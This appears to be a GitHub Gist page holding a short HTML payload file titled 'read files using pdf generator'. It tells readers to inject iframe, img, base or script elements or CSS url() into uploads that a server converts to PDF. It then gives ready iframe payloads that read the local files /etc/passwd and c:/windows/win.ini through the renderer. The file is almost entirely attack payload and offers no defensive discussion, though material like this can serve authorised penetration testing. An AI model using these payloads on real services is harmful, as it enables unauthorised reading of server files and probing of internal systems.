Created
May 9, 2026 17:34
-
-
Save ayadim/ce3f756d2edacb6c139ac8012e03d463 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <title>read files using pdf generator</title> | |
| </head> | |
| <body> | |
| <p>There are some cases where server converts uploaded file to a pdf | |
| Try injecting <iframe>, <img>, <base> or <script> elements or CSS url() functions pointing to internal services.</p> | |
| <iframe src=”file:///etc/passwd” width=”400" height=”400"> | |
| <iframe src=”file:///c:/windows/win.ini” width=”400" height=”400"> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment